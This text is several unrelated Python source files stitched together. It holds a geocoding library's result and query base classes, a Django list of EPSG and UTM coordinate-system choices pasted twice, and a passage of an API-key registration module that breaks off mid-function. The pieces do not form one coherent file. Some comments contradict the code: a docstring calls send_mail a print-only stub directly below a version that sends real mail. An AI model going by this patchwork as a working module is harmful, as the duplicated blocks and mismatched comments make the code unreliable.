                   'xy', 'northeast', 'northwest', 'southeast', 'southwest',
                   'road_long', 'city_long', 'state_long', 'country_long',
                   'postal_town_long', 'province_long', 'road_long',
                   'street_long', 'interpolated', 'method', 'geometry', 'session']

    def __init__(self, json_content):
        """Store the raw provider object and immediately build the cleaned JSON."""
        self.raw = json_content
        # attributes required to compute bbox
        self.northeast = []
        self.northwest = []
        self.southeast = []
        self.southwest = []
        # attributes returned in JSON format
        self.fieldnames = []
        self.json = {}
        self._parse_json_with_fieldnames()

    # Essential attributes for Quality Control — providers override these.
    @property
    def lat(self):
        return ''

    @property
    def lng(self):
        return ''

    @property
    def accuracy(self):
        return ''

    @property
    def quality(self):
        return ''

    # Bounding Box attributes
    @property
    def bbox(self):
        return {}

    # Essential attributes for Street Address
    @property
    def address(self):
        return ''

    @property
    def housenumber(self):
        return ''

    @property
    def street(self):
        return ''

    @property
    def city(self):
        return ''

    @property
    def state(self):
        return ''

    @property
    def country(self):
        return ''

    @property
    def postal(self):
        return ''

    def __repr__(self):
        """ Display [address] if available; [lat,lng] otherwise"""
        if self.address:
            return u'[{0}]'.format(six.text_type(self.address))
        else:
            return u'[{0},{1}]'.format(self.lat, self.lng)

    def _parse_json_with_fieldnames(self):
        """ Parse the raw JSON with all attributes/methods defined in the class, except for the
            ones defined starting with '_' or flagged in cls._TO_EXCLUDE.

            The final result is stored in self.json
        """
        for key in dir(self):
            if not key.startswith('_') and key not in self._TO_EXCLUDE:
                self.fieldnames.append(key)
                value = getattr(self, key)
                if value:
                    self.json[key] = value
        # Add OK attribute even if value is "False"
        self.json['ok'] = self.ok

    @property
    def ok(self):
        """True when both coordinates were parsed (truthy lat and lng)."""
        return bool(self.lng and self.lat)

    @property
    def status(self):
        """Human-readable outcome for this single result."""
        if self.ok:
            return 'OK'
        if not self.address:
            return 'ERROR - No results found'
        return 'ERROR - No Geometry'

    def debug(self):
        """Pretty-print raw/cleaned JSON plus OSM and fieldname coverage checklists."""
        print('')
        print('From provider')
        print('-----------')
        print(json.dumps(self.raw, indent=4))
        print('')
        print('Cleaned json')
        print('-----------')
        print(json.dumps(self.json, indent=4))
        print('')
        print('OSM Quality')
        print('-----------')
        count = 0
        for key in self.osm:
            if 'addr:' in key:
                # The cleaned json stores address parts without the 'addr:' prefix.
                if self.json.get(key.replace('addr:', '')):
                    print('- [x] {0}'.format(key))
                    count += 1
                else:
                    print('- [ ] {0}'.format(key))
        print('({0}/{1})'.format(count, len(self.osm) - 2))
        print('')
        print('Fieldnames')
        print('----------')
        count = 0
        for fieldname in self.fieldnames:
            if self.json.get(fieldname):
                print('- [x] {0}'.format(fieldname))
                count += 1
            else:
                print('- [ ] {0}'.format(fieldname))
        print('({0}/{1})'.format(count, len(self.fieldnames)))

    def _get_bbox(self, south, west, north, east):
        """Store the bounding-box corners and return the bbox dict (or {}).

        Fix: an edge equal to 0 (equator / prime meridian) is a valid
        coordinate; only None and empty strings are treated as "missing".
        The previous truthiness test dropped legitimate 0.0 values.
        """
        if any(edge is None or edge == '' for edge in (south, west, north, east)):
            return {}
        # South Latitude, West Longitude, North Latitude, East Longitude
        self.south = float(south)
        self.west = float(west)
        self.north = float(north)
        self.east = float(east)
        # Bounding Box Corners
        self.northeast = [self.north, self.east]
        self.northwest = [self.north, self.west]
        self.southwest = [self.south, self.west]
        self.southeast = [self.south, self.east]
        # GeoJSON bbox (lng/lat order)
        self.westsouth = [self.west, self.south]
        self.eastnorth = [self.east, self.north]
        return dict(northeast=self.northeast, southwest=self.southwest)

    @property
    def confidence(self):
        """Score 1-10 from bbox size (10 = tightest); 0 when no bbox is known."""
        if self.bbox:
            # Units are measured in Kilometers
            distance = Distance(self.northeast, self.southwest, units='km')
            for score, maximum in [(10, 0.25),
                                   (9, 0.5),
                                   (8, 1),
                                   (7, 5),
                                   (6, 7.5),
                                   (5, 10),
                                   (4, 15),
                                   (3, 20),
                                   (2, 25)]:
                if distance < maximum:
                    return score
            if distance >= 25:
                return 1
        # Cannot determine score
        return 0

    @property
    def geometry(self):
        """GeoJSON Point geometry, or {} when coordinates are missing."""
        if self.ok:
            return {
                'type': 'Point',
                'coordinates': [self.x, self.y]}
        return {}

    @property
    def osm(self):
        """Result serialized as OpenStreetMap-style tags ('addr:*' keys plus x/y)."""
        osm = dict()
        if self.ok:
            osm['x'] = self.x
            osm['y'] = self.y
        if self.housenumber:
            osm['addr:housenumber'] = self.housenumber
        if self.road:
            osm['addr:street'] = self.road
        if self.city:
            osm['addr:city'] = self.city
        if self.state:
            osm['addr:state'] = self.state
        if self.country:
            osm['addr:country'] = self.country
        if self.postal:
            osm['addr:postal'] = self.postal
        # population is only defined by some providers, hence the hasattr guard.
        if hasattr(self, 'population'):
            if self.population:
                osm['population'] = self.population
        return osm

    @property
    def geojson(self):
        """Result as a GeoJSON Feature; bbox attached when available."""
        feature = {
            'type': 'Feature',
            'properties': self.json,
        }
        if self.bbox:
            feature['bbox'] = [self.west, self.south, self.east, self.north]
            feature['properties']['bbox'] = feature['bbox']
        if self.geometry:
            feature['geometry'] = self.geometry
        return feature

    @property
    def wkt(self):
        """Well-Known Text point, or '' when not ok."""
        if self.ok:
            return 'POINT({x} {y})'.format(x=self.x, y=self.y)
        return ''

    @property
    def xy(self):
        """Coordinates in x/y order ([lng, lat]), or [] when not ok."""
        if self.ok:
            return [self.lng, self.lat]
        return []

    @property
    def latlng(self):
        """Coordinates in lat/lng order, or [] when not ok."""
        if self.ok:
            return [self.lat, self.lng]
        return []

    @property
    def y(self):
        # Alias for latitude.
        return self.lat

    @property
    def x(self):
        # Alias for longitude.
        return self.lng

    @property
    def locality(self):
        # Alias for city.
        return self.city

    @property
    def province(self):
        # Alias for state.
        return self.state

    @property
    def street_number(self):
        # Alias for housenumber.
        return self.housenumber

    @property
    def road(self):
        # Alias for street.
        return self.street

    @property
    def route(self):
        # Alias for street.
        return self.street
class MultipleResultsQuery(OrderedSet):
    """ Will replace the Base class to support multiple results, with the following differences :

        - split class into 2 parts :
            - OneResult to actually store a (JSON) object from provider
            - MultipleResultsQuery to manage the query
        - class variables moved into instance
        - remaining class variables are names with convention: _CAPITALS
        - self.url derived from class var cls.URL, which must be a valid URL
        - self.timeout has default value from class var cls.TIMEOUT
    """
    _URL = None
    _RESULT_CLASS = None
    _KEY = None
    _TIMEOUT = 5.0

    @staticmethod
    def _is_valid_url(url):
        """ Helper function to validate that URLs are well formed, i.e that it contains a valid
            protocol and a valid domain. It does not actually check if the URL exists
        """
        try:
            parsed = urlparse(url)
            mandatory_parts = [parsed.scheme, parsed.netloc]
            return all(mandatory_parts)
        except Exception:
            # Fix: was a bare 'except:', which also swallowed SystemExit /
            # KeyboardInterrupt; only genuine parse failures mean "invalid".
            return False

    @classmethod
    def _is_valid_result_class(cls):
        """True when the subclass declared a OneResult-derived _RESULT_CLASS."""
        return issubclass(cls._RESULT_CLASS, OneResult)

    @classmethod
    def _get_api_key(cls, key=None):
        """Return *key* when given, else the class-level default; raise when neither exists."""
        # Retrieves API Key from method argument first, then from Environment variables
        key = key or cls._KEY
        # raise exception if not valid key found
        if not key:
            raise ValueError('Provide API Key')
        return key

    def __init__(self, location, **kwargs):
        """Validate the class configuration, build the request, then run the query.

        Recognized keyword arguments: key, encoding, timeout, proxies, session,
        headers, params; everything else is forwarded to the subclass hooks
        (_build_headers / _build_params / _before_initialize).
        """
        super(MultipleResultsQuery, self).__init__()
        # check validity of URL
        if not self._is_valid_url(self._URL):
            raise ValueError("Subclass must define a valid URL")
        self.url = self._URL
        # check validity of Result class
        if not self._is_valid_result_class():
            raise ValueError(
                "Your class should define _RESULT_CLASS with a subclass of OneResult")
        self.one_result = self._RESULT_CLASS
        # check validity of provider key
        provider_key = self._get_api_key(kwargs.pop('key', None))
        # point to geocode, as a string or coordinates
        self.location = location
        # set attributes to manage query
        self.encoding = kwargs.get('encoding', 'utf-8')
        self.timeout = kwargs.get('timeout', self._TIMEOUT)
        self.proxies = kwargs.get('proxies', '')
        self.session = kwargs.get('session', requests.Session())
        # headers can be overriden in _build_headers
        self.headers = kwargs.get(
            'headers', self._build_headers(provider_key, **kwargs))
        # params can be overriden in _build_params
        # it is an OrderedDict in order to preserver the order of the url query parameters
        self.params = OrderedDict(kwargs.get(
            'params', self._build_params(location, provider_key, **kwargs)))
        # results of query (set by _connect)
        self.status_code = None
        self.response = None
        self.error = False
        # pointer to result where to delegates calls
        self.current_result = None
        # hook for children class to finalize their setup before the query
        self._before_initialize(location, **kwargs)
        # query and parse results
        self._initialize()

    def __repr__(self):
        """Status, provider and method plus a summary of the result set."""
        base_repr = u'<[{0}] {1} - {2} {{0}}>'.format(
            self.status,
            self.provider.title(),
            self.method.title()
        )
        if len(self) == 0:
            return base_repr.format(u'[empty]')
        elif len(self) == 1:
            return base_repr.format(repr(self[0]))
        else:
            return base_repr.format(u'#%s results' % len(self))

    def _build_headers(self, provider_key, **kwargs):
        """Will be overridden according to the targetted web service"""
        return {}

    def _build_params(self, location, provider_key, **kwargs):
        """Will be overridden according to the targetted web service"""
        return {}

    def _before_initialize(self, location, **kwargs):
        """Can be overridden to finalize setup before the query"""
        pass

    def _initialize(self):
        """Run the HTTP query and, on success, parse results into the set."""
        # query URL and get valid JSON (also stored in self.json)
        json_response = self._connect()
        # catch errors
        has_error = self._catch_errors(
            json_response) if json_response else True
        # creates instances for results
        if not has_error:
            self._parse_results(json_response)

    def _connect(self):
        """ - Query self.url (validated cls._URL)
            - Analyse reponse and set status, errors accordingly
            - On success:
                returns the content of the response as a JSON object
        """
        self.status_code = 'Unknown'
        response = None
        try:
            # make request and get response
            self.response = response = self.rate_limited_get(
                self.url,
                params=self.params,
                headers=self.headers,
                timeout=self.timeout,
                proxies=self.proxies
            )
            # check that response is ok
            response.raise_for_status()
            self.status_code = 200
            # rely on json method to get non-empty well formatted JSON
            json_response = response.json()
            self.url = response.url
        except requests.exceptions.RequestException as err:
            # Fix: 'response' was unbound when the request itself failed
            # (connection error / timeout), turning this handler into a NameError.
            if response is not None:
                self.status_code = response.status_code
                self.error = u'ERROR - {}'.format(str(response))
            else:
                self.error = u'ERROR - {}'.format(str(err))
            return False
        # return response within its JSON format
        return json_response

    def rate_limited_get(self, url, **kwargs):
        """ By default, simply wraps a session.get request"""
        return self.session.get(url, **kwargs)

    def _adapt_results(self, json_content):
        """ Allow children classes to format json_content into an array of objects
            OVERRIDE TO FETCH the correct array of objects when necessary
        """
        return json_content

    def _parse_results(self, json_content):
        """ Creates instances of self.one_result (validated cls._RESULT_CLASS)
            from JSON results retrieved by self._connect
        """
        for json_dict in self._adapt_results(json_content):
            self.add(self.one_result(json_dict))
        # Set the default result to delegate to; None when the provider
        # returned nothing (the previous 'len(self) > 0 and self[0]' stored
        # the literal False in that case).
        self.current_result = self[0] if len(self) else None

    def _catch_errors(self, json_response):
        """ Checks the JSON returned from the provider and flag errors if necessary"""
        return self.error

    @property
    def ok(self):
        """True when at least one result was parsed."""
        return len(self) > 0

    @property
    def status(self):
        """Human-readable outcome of the whole query."""
        if self.ok:
            return 'OK'
        # Fix: the provider error (if any) must be checked before the generic
        # "no results" message — the old elif order made the error branch
        # unreachable, since not-ok always implied len(self) == 0.
        elif self.error:
            return self.error
        elif len(self) == 0:
            return 'ERROR - No results found'
        else:
            return 'ERROR - Unhandled Exception'

    @property
    def geojson(self):
        """All results wrapped in a GeoJSON FeatureCollection."""
        geojson_results = [result.geojson for result in self]
        features = {
            'type': 'FeatureCollection',
            'features': geojson_results
        }
        return features

    def debug(self):
        """Print query status, then the debug output of every result."""
        print('===')
        print(repr(self))
        print('===')
        print('')
        print('#res: {}'.format(len(self)))
        print('code: {}'.format(self.status_code))
        print('url:  {}'.format(self.url))
        if self.ok:
            for index, result in enumerate(self):
                print('')
                print('Details for result #{}'.format(index + 1))
                print('---')
                result.debug()
        else:
            print(self.status)

    # Delegation to current result
    def set_default_result(self, index):
        """ change the result used to delegate the calls to. The provided index should be in the
            range of results, otherwise it will raise an exception
        """
        self.current_result = self[index]

    def __getattr__(self, name):
        """ Called when an attribute lookup has not found the attribute in the usual places (i.e.
            it is not an instance attribute nor is it found in the class tree for self).

            Delegates the lookup to the currently selected result.
        """
        # No results at all: surface the query status instead of a confusing miss.
        if not self.ok:
            raise ValueError(self.status)
        if self.current_result is None:
            # Fix: the original mixed '%s' placeholders with str.format(), so
            # the message was never interpolated.
            raise AttributeError('{0} not found on {1}, and current_result is None'.format(
                name, self.__class__.__name__))
        return getattr(self.current_result, name)
# (stray extraction artifact removed — end of geocoder base module)
# NOTE: translations must be lazy here -- these choice tuples are built once
# at import time, before any request locale is active, so an eager gettext()
# would permanently bake the default language into the labels.
from django.utils.translation import gettext_lazy as _

# most common reference systems (EPSG codes)
WGS_84 = 4326
WGS_72 = 4322
PSEUDO_MERCATOR = 3857
# NAD83 is EPSG:4269; the previous value 4629 was a digit transposition.
NAD_83 = 4269
OSGB_36 = 4277

GLOBAL_CHOICES = (
    (WGS_84, _('WGS 84')),
    (PSEUDO_MERCATOR, _('Pseudo-Mercator')),
    (WGS_72, _('WGS 72')),
    (NAD_83, _('NAD 83')),
    (OSGB_36, _('OSGB 36')),
)

# WGS 84 / UTM zones: EPSG 32601-32660 (north) and 32701-32760 (south).
# Each entry is a separate string literal so gettext message extraction
# produces one msgid per zone.
UTM_ZONE_CHOICES = (
    (32601, _('UTM Zone 1, northern hemisphere')),
    (32602, _('UTM Zone 2, northern hemisphere')),
    (32603, _('UTM Zone 3, northern hemisphere')),
    (32604, _('UTM Zone 4, northern hemisphere')),
    (32605, _('UTM Zone 5, northern hemisphere')),
    (32606, _('UTM Zone 6, northern hemisphere')),
    (32607, _('UTM Zone 7, northern hemisphere')),
    (32608, _('UTM Zone 8, northern hemisphere')),
    (32609, _('UTM Zone 9, northern hemisphere')),
    (32610, _('UTM Zone 10, northern hemisphere')),
    (32611, _('UTM Zone 11, northern hemisphere')),
    (32612, _('UTM Zone 12, northern hemisphere')),
    (32613, _('UTM Zone 13, northern hemisphere')),
    (32614, _('UTM Zone 14, northern hemisphere')),
    (32615, _('UTM Zone 15, northern hemisphere')),
    (32616, _('UTM Zone 16, northern hemisphere')),
    (32617, _('UTM Zone 17, northern hemisphere')),
    (32618, _('UTM Zone 18, northern hemisphere')),
    (32619, _('UTM Zone 19, northern hemisphere')),
    (32620, _('UTM Zone 20, northern hemisphere')),
    (32621, _('UTM Zone 21, northern hemisphere')),
    (32622, _('UTM Zone 22, northern hemisphere')),
    (32623, _('UTM Zone 23, northern hemisphere')),
    (32624, _('UTM Zone 24, northern hemisphere')),
    (32625, _('UTM Zone 25, northern hemisphere')),
    (32626, _('UTM Zone 26, northern hemisphere')),
    (32627, _('UTM Zone 27, northern hemisphere')),
    (32628, _('UTM Zone 28, northern hemisphere')),
    (32629, _('UTM Zone 29, northern hemisphere')),
    (32630, _('UTM Zone 30, northern hemisphere')),
    (32631, _('UTM Zone 31, northern hemisphere')),
    (32632, _('UTM Zone 32, northern hemisphere')),
    (32633, _('UTM Zone 33, northern hemisphere')),
    (32634, _('UTM Zone 34, northern hemisphere')),
    (32635, _('UTM Zone 35, northern hemisphere')),
    (32636, _('UTM Zone 36, northern hemisphere')),
    (32637, _('UTM Zone 37, northern hemisphere')),
    (32638, _('UTM Zone 38, northern hemisphere')),
    (32639, _('UTM Zone 39, northern hemisphere')),
    (32640, _('UTM Zone 40, northern hemisphere')),
    (32641, _('UTM Zone 41, northern hemisphere')),
    (32642, _('UTM Zone 42, northern hemisphere')),
    (32643, _('UTM Zone 43, northern hemisphere')),
    (32644, _('UTM Zone 44, northern hemisphere')),
    (32645, _('UTM Zone 45, northern hemisphere')),
    (32646, _('UTM Zone 46, northern hemisphere')),
    (32647, _('UTM Zone 47, northern hemisphere')),
    (32648, _('UTM Zone 48, northern hemisphere')),
    (32649, _('UTM Zone 49, northern hemisphere')),
    (32650, _('UTM Zone 50, northern hemisphere')),
    (32651, _('UTM Zone 51, northern hemisphere')),
    (32652, _('UTM Zone 52, northern hemisphere')),
    (32653, _('UTM Zone 53, northern hemisphere')),
    (32654, _('UTM Zone 54, northern hemisphere')),
    (32655, _('UTM Zone 55, northern hemisphere')),
    (32656, _('UTM Zone 56, northern hemisphere')),
    (32657, _('UTM Zone 57, northern hemisphere')),
    (32658, _('UTM Zone 58, northern hemisphere')),
    (32659, _('UTM Zone 59, northern hemisphere')),
    (32660, _('UTM Zone 60, northern hemisphere')),
    (32701, _('UTM Zone 1, southern hemisphere')),
    (32702, _('UTM Zone 2, southern hemisphere')),
    (32703, _('UTM Zone 3, southern hemisphere')),
    (32704, _('UTM Zone 4, southern hemisphere')),
    (32705, _('UTM Zone 5, southern hemisphere')),
    (32706, _('UTM Zone 6, southern hemisphere')),
    (32707, _('UTM Zone 7, southern hemisphere')),
    (32708, _('UTM Zone 8, southern hemisphere')),
    (32709, _('UTM Zone 9, southern hemisphere')),
    (32710, _('UTM Zone 10, southern hemisphere')),
    (32711, _('UTM Zone 11, southern hemisphere')),
    (32712, _('UTM Zone 12, southern hemisphere')),
    (32713, _('UTM Zone 13, southern hemisphere')),
    (32714, _('UTM Zone 14, southern hemisphere')),
    (32715, _('UTM Zone 15, southern hemisphere')),
    (32716, _('UTM Zone 16, southern hemisphere')),
    (32717, _('UTM Zone 17, southern hemisphere')),
    (32718, _('UTM Zone 18, southern hemisphere')),
    (32719, _('UTM Zone 19, southern hemisphere')),
    (32720, _('UTM Zone 20, southern hemisphere')),
    (32721, _('UTM Zone 21, southern hemisphere')),
    (32722, _('UTM Zone 22, southern hemisphere')),
    (32723, _('UTM Zone 23, southern hemisphere')),
    (32724, _('UTM Zone 24, southern hemisphere')),
    (32725, _('UTM Zone 25, southern hemisphere')),
    (32726, _('UTM Zone 26, southern hemisphere')),
    (32727, _('UTM Zone 27, southern hemisphere')),
    (32728, _('UTM Zone 28, southern hemisphere')),
    (32729, _('UTM Zone 29, southern hemisphere')),
    (32730, _('UTM Zone 30, southern hemisphere')),
    (32731, _('UTM Zone 31, southern hemisphere')),
    (32732, _('UTM Zone 32, southern hemisphere')),
    (32733, _('UTM Zone 33, southern hemisphere')),
    (32734, _('UTM Zone 34, southern hemisphere')),
    (32735, _('UTM Zone 35, southern hemisphere')),
    (32736, _('UTM Zone 36, southern hemisphere')),
    (32737, _('UTM Zone 37, southern hemisphere')),
    (32738, _('UTM Zone 38, southern hemisphere')),
    (32739, _('UTM Zone 39, southern hemisphere')),
    (32740, _('UTM Zone 40, southern hemisphere')),
    (32741, _('UTM Zone 41, southern hemisphere')),
    (32742, _('UTM Zone 42, southern hemisphere')),
    (32743, _('UTM Zone 43, southern hemisphere')),
    (32744, _('UTM Zone 44, southern hemisphere')),
    (32745, _('UTM Zone 45, southern hemisphere')),
    (32746, _('UTM Zone 46, southern hemisphere')),
    (32747, _('UTM Zone 47, southern hemisphere')),
    (32748, _('UTM Zone 48, southern hemisphere')),
    (32749, _('UTM Zone 49, southern hemisphere')),
    (32750, _('UTM Zone 50, southern hemisphere')),
    (32751, _('UTM Zone 51, southern hemisphere')),
    (32752, _('UTM Zone 52, southern hemisphere')),
    (32753, _('UTM Zone 53, southern hemisphere')),
    (32754, _('UTM Zone 54, southern hemisphere')),
    (32755, _('UTM Zone 55, southern hemisphere')),
    (32756, _('UTM Zone 56, southern hemisphere')),
    (32757, _('UTM Zone 57, southern hemisphere')),
    (32758, _('UTM Zone 58, southern hemisphere')),
    (32759, _('UTM Zone 59, southern hemisphere')),
    (32760, _('UTM Zone 60, southern hemisphere')),
)

# Grouped choices for Django form/model fields: (group label, choices).
CRS_CHOICES = (
    (_('Global coordinate reference systems'), GLOBAL_CHOICES),
    (_('UTM zones'), UTM_ZONE_CHOICES),
)
# Variant below: uses lazy translation (gettext_lazy) for the CRS choices.
# Lazy translation: these choice tuples are built once at import time,
# before any request locale is active, so the labels must be translated
# only when rendered.
from django.utils.translation import gettext_lazy as _

# most common reference systems (EPSG codes)
WGS_84 = 4326
WGS_72 = 4322
PSEUDO_MERCATOR = 3857
# NAD83 is EPSG:4269; the previous value 4629 was a digit transposition.
NAD_83 = 4269
OSGB_36 = 4277

GLOBAL_CHOICES = (
    (WGS_84, _('WGS 84')),
    (PSEUDO_MERCATOR, _('Pseudo-Mercator')),
    (WGS_72, _('WGS 72')),
    (NAD_83, _('NAD 83')),
    (OSGB_36, _('OSGB 36')),
)

# WGS 84 / UTM zones: EPSG 32601-32660 (north) and 32701-32760 (south).
# Each entry is a separate string literal so gettext message extraction
# produces one msgid per zone.
UTM_ZONE_CHOICES = (
    (32601, _('UTM Zone 1, northern hemisphere')),
    (32602, _('UTM Zone 2, northern hemisphere')),
    (32603, _('UTM Zone 3, northern hemisphere')),
    (32604, _('UTM Zone 4, northern hemisphere')),
    (32605, _('UTM Zone 5, northern hemisphere')),
    (32606, _('UTM Zone 6, northern hemisphere')),
    (32607, _('UTM Zone 7, northern hemisphere')),
    (32608, _('UTM Zone 8, northern hemisphere')),
    (32609, _('UTM Zone 9, northern hemisphere')),
    (32610, _('UTM Zone 10, northern hemisphere')),
    (32611, _('UTM Zone 11, northern hemisphere')),
    (32612, _('UTM Zone 12, northern hemisphere')),
    (32613, _('UTM Zone 13, northern hemisphere')),
    (32614, _('UTM Zone 14, northern hemisphere')),
    (32615, _('UTM Zone 15, northern hemisphere')),
    (32616, _('UTM Zone 16, northern hemisphere')),
    (32617, _('UTM Zone 17, northern hemisphere')),
    (32618, _('UTM Zone 18, northern hemisphere')),
    (32619, _('UTM Zone 19, northern hemisphere')),
    (32620, _('UTM Zone 20, northern hemisphere')),
    (32621, _('UTM Zone 21, northern hemisphere')),
    (32622, _('UTM Zone 22, northern hemisphere')),
    (32623, _('UTM Zone 23, northern hemisphere')),
    (32624, _('UTM Zone 24, northern hemisphere')),
    (32625, _('UTM Zone 25, northern hemisphere')),
    (32626, _('UTM Zone 26, northern hemisphere')),
    (32627, _('UTM Zone 27, northern hemisphere')),
    (32628, _('UTM Zone 28, northern hemisphere')),
    (32629, _('UTM Zone 29, northern hemisphere')),
    (32630, _('UTM Zone 30, northern hemisphere')),
    (32631, _('UTM Zone 31, northern hemisphere')),
    (32632, _('UTM Zone 32, northern hemisphere')),
    (32633, _('UTM Zone 33, northern hemisphere')),
    (32634, _('UTM Zone 34, northern hemisphere')),
    (32635, _('UTM Zone 35, northern hemisphere')),
    (32636, _('UTM Zone 36, northern hemisphere')),
    (32637, _('UTM Zone 37, northern hemisphere')),
    (32638, _('UTM Zone 38, northern hemisphere')),
    (32639, _('UTM Zone 39, northern hemisphere')),
    (32640, _('UTM Zone 40, northern hemisphere')),
    (32641, _('UTM Zone 41, northern hemisphere')),
    (32642, _('UTM Zone 42, northern hemisphere')),
    (32643, _('UTM Zone 43, northern hemisphere')),
    (32644, _('UTM Zone 44, northern hemisphere')),
    (32645, _('UTM Zone 45, northern hemisphere')),
    (32646, _('UTM Zone 46, northern hemisphere')),
    (32647, _('UTM Zone 47, northern hemisphere')),
    (32648, _('UTM Zone 48, northern hemisphere')),
    (32649, _('UTM Zone 49, northern hemisphere')),
    (32650, _('UTM Zone 50, northern hemisphere')),
    (32651, _('UTM Zone 51, northern hemisphere')),
    (32652, _('UTM Zone 52, northern hemisphere')),
    (32653, _('UTM Zone 53, northern hemisphere')),
    (32654, _('UTM Zone 54, northern hemisphere')),
    (32655, _('UTM Zone 55, northern hemisphere')),
    (32656, _('UTM Zone 56, northern hemisphere')),
    (32657, _('UTM Zone 57, northern hemisphere')),
    (32658, _('UTM Zone 58, northern hemisphere')),
    (32659, _('UTM Zone 59, northern hemisphere')),
    (32660, _('UTM Zone 60, northern hemisphere')),
    (32701, _('UTM Zone 1, southern hemisphere')),
    (32702, _('UTM Zone 2, southern hemisphere')),
    (32703, _('UTM Zone 3, southern hemisphere')),
    (32704, _('UTM Zone 4, southern hemisphere')),
    (32705, _('UTM Zone 5, southern hemisphere')),
    (32706, _('UTM Zone 6, southern hemisphere')),
    (32707, _('UTM Zone 7, southern hemisphere')),
    (32708, _('UTM Zone 8, southern hemisphere')),
    (32709, _('UTM Zone 9, southern hemisphere')),
    (32710, _('UTM Zone 10, southern hemisphere')),
    (32711, _('UTM Zone 11, southern hemisphere')),
    (32712, _('UTM Zone 12, southern hemisphere')),
    (32713, _('UTM Zone 13, southern hemisphere')),
    (32714, _('UTM Zone 14, southern hemisphere')),
    (32715, _('UTM Zone 15, southern hemisphere')),
    (32716, _('UTM Zone 16, southern hemisphere')),
    (32717, _('UTM Zone 17, southern hemisphere')),
    (32718, _('UTM Zone 18, southern hemisphere')),
    (32719, _('UTM Zone 19, southern hemisphere')),
    (32720, _('UTM Zone 20, southern hemisphere')),
    (32721, _('UTM Zone 21, southern hemisphere')),
    (32722, _('UTM Zone 22, southern hemisphere')),
    (32723, _('UTM Zone 23, southern hemisphere')),
    (32724, _('UTM Zone 24, southern hemisphere')),
    (32725, _('UTM Zone 25, southern hemisphere')),
    (32726, _('UTM Zone 26, southern hemisphere')),
    (32727, _('UTM Zone 27, southern hemisphere')),
    (32728, _('UTM Zone 28, southern hemisphere')),
    (32729, _('UTM Zone 29, southern hemisphere')),
    (32730, _('UTM Zone 30, southern hemisphere')),
    (32731, _('UTM Zone 31, southern hemisphere')),
    (32732, _('UTM Zone 32, southern hemisphere')),
    (32733, _('UTM Zone 33, southern hemisphere')),
    (32734, _('UTM Zone 34, southern hemisphere')),
    (32735, _('UTM Zone 35, southern hemisphere')),
    (32736, _('UTM Zone 36, southern hemisphere')),
    (32737, _('UTM Zone 37, southern hemisphere')),
    (32738, _('UTM Zone 38, southern hemisphere')),
    (32739, _('UTM Zone 39, southern hemisphere')),
    (32740, _('UTM Zone 40, southern hemisphere')),
    (32741, _('UTM Zone 41, southern hemisphere')),
    (32742, _('UTM Zone 42, southern hemisphere')),
    (32743, _('UTM Zone 43, southern hemisphere')),
    (32744, _('UTM Zone 44, southern hemisphere')),
    (32745, _('UTM Zone 45, southern hemisphere')),
    (32746, _('UTM Zone 46, southern hemisphere')),
    (32747, _('UTM Zone 47, southern hemisphere')),
    (32748, _('UTM Zone 48, southern hemisphere')),
    (32749, _('UTM Zone 49, southern hemisphere')),
    (32750, _('UTM Zone 50, southern hemisphere')),
    (32751, _('UTM Zone 51, southern hemisphere')),
    (32752, _('UTM Zone 52, southern hemisphere')),
    (32753, _('UTM Zone 53, southern hemisphere')),
    (32754, _('UTM Zone 54, southern hemisphere')),
    (32755, _('UTM Zone 55, southern hemisphere')),
    (32756, _('UTM Zone 56, southern hemisphere')),
    (32757, _('UTM Zone 57, southern hemisphere')),
    (32758, _('UTM Zone 58, southern hemisphere')),
    (32759, _('UTM Zone 59, southern hemisphere')),
    (32760, _('UTM Zone 60, southern hemisphere')),
)

# Grouped choices for Django form/model fields: (group label, choices).
CRS_CHOICES = (
    (_('Global coordinate reference systems'), GLOBAL_CHOICES),
    (_('UTM zones'), UTM_ZONE_CHOICES),
)
|
import uuid
from django.template.loader import render_to_string
from django.shortcuts import render_to_response
from django.conf import settings
from django.forms import ModelForm
from django.conf.urls.defaults import url
from locksmith.common import ApiBase, get_signature
from locksmith.auth.models import Key
def send_mail(title, msg, sender, to):
    """Send the registration email.

    Replaces the previous debugging stub, which only printed its arguments
    and never delivered any mail.  The signature is kept for existing
    callers and maps directly onto Django's
    ``send_mail(subject, message, from_email, recipient_list)``.
    """
    # Imported locally so this module keeps working even if mail settings
    # are only configured at runtime.
    from django.core.mail import send_mail as django_send_mail
    django_send_mail(title, msg, sender, to)
class ApiAuth(ApiBase):
    """API-key self-registration endpoints (register + email confirmation).

    NOTE(review): this variant relies on the module-level ``send_mail``
    debugging stub above, which only prints -- no real email is sent.
    """
    key_model = Key
    # Cached ModelForm class, built lazily by get_key_model_form().
    key_model_form = None
    # When True, new keys start unconfirmed ('U') until the emailed
    # confirmation link is visited; otherwise they are active ('A') at once.
    require_confirmation = False
    registration_email_subject = 'API Registration'
    registration_email_from = settings.DEFAULT_FROM_EMAIL
    registration_email_template = 'locksmith/registration_email.txt'
    registration_template = 'locksmith/register.html'
    registration_complete_template = 'locksmith/registered.html'
    registration_confirmed_template = 'locksmith/confirmed.html'
    def get_key_model_form(self):
        """Build (once) and cache a ModelForm over ``key_model``."""
        if not self.key_model_form:
            class Form(ModelForm):
                class Meta:
                    model = self.key_model
                    exclude = ('key', 'status', 'issued_on', 'pub_status')
            self.key_model_form = Form
        return self.key_model_form
    def verify_signature(self, post):
        """True when *post*'s 'signature' matches get_signature() over our key."""
        return get_signature(post, settings.LOCKSMITH_SIGNING_KEY) == post['signature']
    def get_urls(self):
        """Base API urls plus the registration/confirmation routes."""
        urls = super(ApiAuth, self).get_urls()
        return urls + [
            url(r'^register/$', self.register, name='api_registration'),
            url(r'^confirmkey/(?P<key>[0-9a-f]{32})/$', self.confirm_registration,
                name='api_confirm')]
    def register(self, request):
        """Render the signup form; on valid POST create and mail a new key."""
        if request.method == 'POST':
            form = self.get_key_model_form()(request.POST)
            if form.is_valid():
                newkey = form.save(commit=False)
                # Keys are random 32-character hex strings.
                newkey.key = uuid.uuid4().hex
                if self.require_confirmation:
                    newkey.status = 'U'
                else:
                    newkey.status = 'A'
                newkey.save()
                email_msg = render_to_string(self.registration_email_template,
                                             {'key': newkey})
                send_mail(self.registration_email_subject, email_msg,
                          self.registration_email_from, [newkey.email])
                return render_to_response(self.registration_complete_template,
                                          {'key': newkey})
        else:
            form = self.get_key_model_form()()
        # Reached on GET and on invalid POST (re-renders the bound form).
        return render_to_response(self.registration_template, {'form':form})
    def confirm_registration(self, request, key):
        """Activate an unconfirmed key reached via the emailed link."""
        context = {}
        try:
            context['key'] = key_obj = self.key_model.objects.get(key=key)
            if key_obj.status != 'U':
